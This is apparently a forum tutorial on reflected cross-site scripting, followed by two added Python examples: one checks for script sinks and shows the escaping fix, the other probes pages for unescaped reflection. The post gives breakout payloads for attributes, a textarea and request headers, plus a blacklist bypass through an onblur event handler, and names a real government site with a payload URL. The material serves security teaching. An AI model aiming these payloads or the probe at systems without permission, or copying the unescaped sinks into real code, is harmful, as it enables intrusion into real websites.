io.kent

XSS deeper than alert..


Let's not limit ourselves to finding XSS the usual way, with the typical script

<script>alert("XSS")</script>

One of the most common vulnerabilities today, and very dangerous like all of them, because if you know how to use it you can do anything you want..

Case 1

any vulnerability is only as limited as you want it to be..

starting with cookies and going up to a deface,

you only need 2 essential things,

1) mindset

2) imagination

after that the sky is the limit..

one of the most common cases

vulnerable code:

<html>
<head>
<title>Search form</title>
</head>
<body>
<center>
<?php
if (isset($_POST['text'])) {
    // the submitted value is written straight back into the value="" attribute, unescaped
    $XSS = $_POST['text'];
    echo "<form name=\"XSS\" method=\"POST\"><h1>0 results</h1><br><hr><br><input type=\"text\" value=\"$XSS\" name=\"text\"><br><input type=\"submit\" value=\"Search\"></form>";
} else {
    echo "<form name=\"XSS\" method=\"POST\"><h1>Search form</h1><br><hr><br><input type=\"text\" value=\"\" name=\"text\"><br><input type=\"submit\" value=\"Search\"></form>";
}
?>
</center>
</body>
</html>

As we can see in the source, if we search for something, whatever we searched for stays in the form

that's easy, we write

">Becali-- "><script>alert("XSS")</script>

which logically would end up like this

<input type="text" value="">

Case 2:

Restriction to certain characters / limited text fields

another very common case, I'll leave you this gem here

http://www.gov.ro/

Nothing could be added in the form, something like:

">$#-|/()=\*¿?

no special character at all; searching for a simple word (buna) the result was this

resultatgeneral.jsp?cuvantul=buna&servici=0

so I did it the following way,

http://url/resultatgeneral.jsp?cuvant="><script>alert(/OK/)</script>&servici=0

Bingo

this can be done with TAMPER DATA (a Firefox add-on),

modifying the content that is sent via POST

Case 3: Textarea

<textarea style="width:320px; height:120px" name=message></textarea>

as you can see, a simple "> doesn't bypass it; if we enter some text it will look like this

<textarea style="width:320px; height:120px" name=message>Message
</textarea>

:)

</textarea><script>alert(/PWNED/)</script>

it would end up like this:

<textarea style="width:320px; height:120px" name=message>
</textarea>
<script>alert(/PWNED/)</script>
</textarea>

Headers

This one is very interesting: we play with the headers to get an XSS out

1 - User-Agent

Source:

<?php

$nav = $_SERVER['HTTP_USER_AGENT'];

echo "<b><center><h1>browser:</h1><br><hr><br>$nav</center></b>";

?>

Header:

Host: localhost

User-Agent: Mozilla/4.0 (compatible; MSIE 5.0; Windows 95)

Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5

Accept-Language: en

Accept-Encoding: gzip,deflate

Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7

Keep-Alive: 300

Connection: keep-alive

and if we modify it: Host: localhost

User-Agent: I don't remember the name :$

Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5

Accept-Language: en

Accept-Encoding: gzip,deflate

Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7

Keep-Alive: 300

Connection: keep-alive


And ... User-Agent: <script>alert(/Yeah/)</script>

2 - Referer

Header:

Host: What IP do I have? What is my IP?

User-Agent: Mozilla/4.0 (compatible; MSIE 5.0; Windows 95)

Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5

Accept-Language: en

Accept-Encoding: gzip,deflate

Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7

Keep-Alive: 300

Connection: keep-alive

Referer:

http://www.google.com.do/

Cookie: ******

and if we modify it:

Host: What IP do I have? What is my IP?

User-Agent: Mozilla/4.0 (compatible; MSIE 5.0; Windows 95)

Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5

Accept-Language: en

Accept-Encoding: gzip,deflate

Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7

Keep-Alive: 300

Connection: keep-alive

Referer: <script>alert(/Yeah/)</script>

Cookie: ******

3 - X-Forwarded-For

Host: What IP do I have? What is my IP?

User-Agent: Mozilla/4.0 (compatible; MSIE 5.0; Windows 95)

Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5

Accept-Language: en

Accept-Encoding: gzip,deflate

Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7

Keep-Alive: 300

Connection: keep-alive

Referer:

http://www.google.com/

X-Forwarded-For: 127.0.0.1

Cookie: ******

127.0.0.1 being the IP to spoof.

this gives us the IP as output; in this case it would be 127.0.0.1

Host: *********

User-Agent: Mozilla/4.0 (compatible; MSIE 5.0; Windows 95)

Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5

Accept-Language: en

Accept-Encoding: gzip,deflate

Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7

Keep-Alive: 300

Connection: keep-alive

Referer:

http://google.com

X-Forwarded-For: <script>alert(/Yeah/)</script>

Cookie: ******

it's the same as an XSS

str_replace

what to do if you find a script like this for XSS

<?php

if (isset($_GET['xss'])) {

    $xss = $_GET['xss'];

    // blacklist "filter": strips the literal strings "<script>" and "alert", nothing else
    $xss2 = str_replace("<script>", "", $xss);
    $xss3 = str_replace("alert", "", $xss2);
    echo "<form name=\"Hi\">
<input type=\"text\" value=\"$xss3\" size=\"30\">
</form>";

}

?>

if we try to put

<script>alert(Yeah)</script> ..

it would end up like this

alert(Yeah)</script>

and so no alert is produced

but let's try to get further: as we see in the source, if we search for (aaaa) this is the result

<input type="text" value="aaa" size="30">

it seemed like something as simple as

"><script>alert(WTF)</script>

but we can't use script :)

so all that's left is to think: the script is completely vulnerable, the code is printed exactly as it arrives, only excluding <script>

here we'll use JavaScript

http://www.w3schools.com/js/js_events.asp

we use: onblur

we enter: Onblur=alert(000); no alert is produced, it stays inside the form

and so, if we enter

owl it would look like this

<input type="text" value="" owl size="30">

so the form value would be null

" Onblur=alert(666) "

<input type="text" value="" " Onblur=alert(666) " size="30">

in this case we would be adding an event property to the input, causing an XSS!!

Good luck...

Edited by io.kent
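The following is an added example, not code from the post above: it models the post's four reflection points (the value="" attribute of cases 1 and 2, the textarea body of case 3, the echoed request headers, and the str_replace blacklist) as Python templates, parses the rendered HTML with a browser-style tokeniser to confirm whether a payload really produces a script tag or event handler, and shows the fix the post's PHP is missing. `html.escape(s, quote=True)` stands in for PHP's `htmlspecialchars($s, ENT_QUOTES)`; the function names and the sample payloads are this example's own.

```python
"""Added example (not the post's code): model of the post's XSS sinks, a parser-based
check for script sinks, and the context-appropriate escape that closes them."""
import html
from html.parser import HTMLParser


# --- the post's sinks, reproduced as Python templates (intentionally unescaped) ---

def reflect_in_attribute(user_input: str) -> str:
    """Cases 1/2 and the str_replace form: input lands inside value="..."."""
    return f'<input type="text" value="{user_input}" size="30">'


def reflect_in_textarea(user_input: str) -> str:
    """Case 3: input lands in the body of a <textarea>."""
    return f'<textarea name="message">{user_input}</textarea>'


def reflect_header(header_value: str) -> str:
    """Headers section: User-Agent / Referer / X-Forwarded-For echoed into the page."""
    return f"<h1>browser:</h1><br><hr><br>{header_value}"


def blacklist_filter(user_input: str) -> str:
    """The post's str_replace chain: delete '<script>' then 'alert', nothing else."""
    return user_input.replace("<script>", "").replace("alert", "")


# --- the fix: encode for the HTML context instead of blacklisting substrings ---

def escape_html(user_input: str) -> str:
    """Equivalent of htmlspecialchars($s, ENT_QUOTES): neutralises < > & " and '."""
    return html.escape(user_input, quote=True)


# --- verdict: tokenise the rendered HTML the way a browser would ---

class ScriptSinkFinder(HTMLParser):
    """Records <script> start tags and on* attributes seen while parsing."""

    def __init__(self) -> None:
        super().__init__()
        self.findings: list[str] = []

    def handle_starttag(self, tag, attrs):
        if tag == "script":
            self.findings.append("<script>")
        for name, value in attrs:
            if name.startswith("on"):
                self.findings.append(f"{name}={value}")


def script_sinks(rendered_html: str) -> list[str]:
    """Every script tag / event-handler attribute a browser would see in rendered_html."""
    finder = ScriptSinkFinder()
    finder.feed(rendered_html)
    finder.close()
    return finder.findings


if __name__ == "__main__":
    cases = {
        "attribute breakout":    reflect_in_attribute('"><script>alert("XSS")</script>'),
        "textarea breakout":     reflect_in_textarea("</textarea><script>alert(/PWNED/)</script>"),
        "User-Agent echo":       reflect_header("<script>alert(/Yeah/)</script>"),
        # 'alalertert' collapses to 'alert' and '<scr<script>ipt>' to '<script>' once the
        # blacklist deletes the inner substring; the event handler was never on the list
        "blacklist, nested tag": reflect_in_attribute(blacklist_filter('"><scr<script>ipt>alalertert(1)</script>')),
        "blacklist, onblur":     reflect_in_attribute(blacklist_filter('" onblur=alalertert(666) "')),
        "escaped attribute":     reflect_in_attribute(escape_html('" onblur=alert(666) "')),
        "escaped header":        reflect_header(escape_html("<script>alert(/Yeah/)</script>")),
    }
    for label, rendered in cases.items():
        print(f"{label:24} {script_sinks(rendered) or 'no script sink'}")
```

The parser-based check is the point: grepping the page for `<script>` cannot tell an injected tag from `&lt;script&gt;` text, while tokenising the output shows exactly which payloads become a tag or an `on*` attribute and which are inert once escaped for the attribute or text context they land in.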

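As a second added example (again not the post's own code), the probing the author does by hand with Tamper Data, as a script: it sends a unique marker through the query parameter and through the User-Agent, Referer and X-Forwarded-For headers, then classifies whether each reflection comes back raw, sanitised, or not at all. The target URL is a placeholder, the parameter name `cuvant` is taken from the post's URL, and the marker string is this example's own; run it only against systems you are authorised to test.

```python
"""Added example (not the post's code): probe the injection points the post uses
(query parameter, User-Agent, Referer, X-Forwarded-For) for unescaped reflection."""
import html
import sys
import urllib.error
import urllib.parse
import urllib.request

STEM = "xzq7r"                 # unlikely alphanumeric token, survives any sanitiser
MARKER = STEM + "'\"<>"        # plus the characters an HTML encoder must alter


def classify_reflection(body: str, marker: str = MARKER) -> str:
    """'raw' if the marker is echoed verbatim (injectable), 'sanitised' if only the
    stem survives (specials encoded or stripped), 'none' if not reflected at all."""
    if marker in body:
        return "raw"
    if STEM in body:
        return "sanitised"
    return "none"


def build_probes(url: str, param: str) -> list[tuple[str, urllib.request.Request]]:
    """One request per injection point, labelled so the verdicts can be reported."""
    base = {"User-Agent": "Mozilla/5.0 (reflection probe)"}
    probes = []
    # query parameter sent directly, bypassing any client-side restriction on the form (case 2)
    sep = "&" if "?" in url else "?"
    query_url = url + sep + urllib.parse.urlencode({param: MARKER})
    probes.append(("query:" + param, urllib.request.Request(query_url, headers=base)))
    for header in ("User-Agent", "Referer", "X-Forwarded-For"):
        headers = dict(base)
        headers[header] = MARKER
        probes.append(("header:" + header, urllib.request.Request(url, headers=headers)))
    return probes


def probe(url: str, param: str = "cuvant") -> dict[str, str]:
    """Send every probe and return {label: verdict}; error pages are classified too."""
    verdicts = {}
    for label, req in build_probes(url, param):
        try:
            with urllib.request.urlopen(req, timeout=10) as resp:
                body = resp.read().decode(resp.headers.get_content_charset() or "utf-8", "replace")
        except urllib.error.HTTPError as err:          # 4xx/5xx pages often reflect headers too
            body = err.read().decode(err.headers.get_content_charset() or "utf-8", "replace")
        except urllib.error.URLError as err:
            verdicts[label] = f"error: {err.reason}"
            continue
        verdicts[label] = classify_reflection(body)
    return verdicts


if __name__ == "__main__":
    if len(sys.argv) < 2:
        print(f"usage: {sys.argv[0]} URL [param]")
        sys.exit(2)
    for label, verdict in probe(sys.argv[1], sys.argv[2] if len(sys.argv) > 2 else "cuvant").items():
        print(f"{label:24} {verdict}")
```

A 'raw' verdict means the characters `'"<>` reached the page untouched and the breakout payloads from the post apply; 'sanitised' means the application encoded or stripped them, so the next step is to look at the exact output context rather than to keep sending `<script>`.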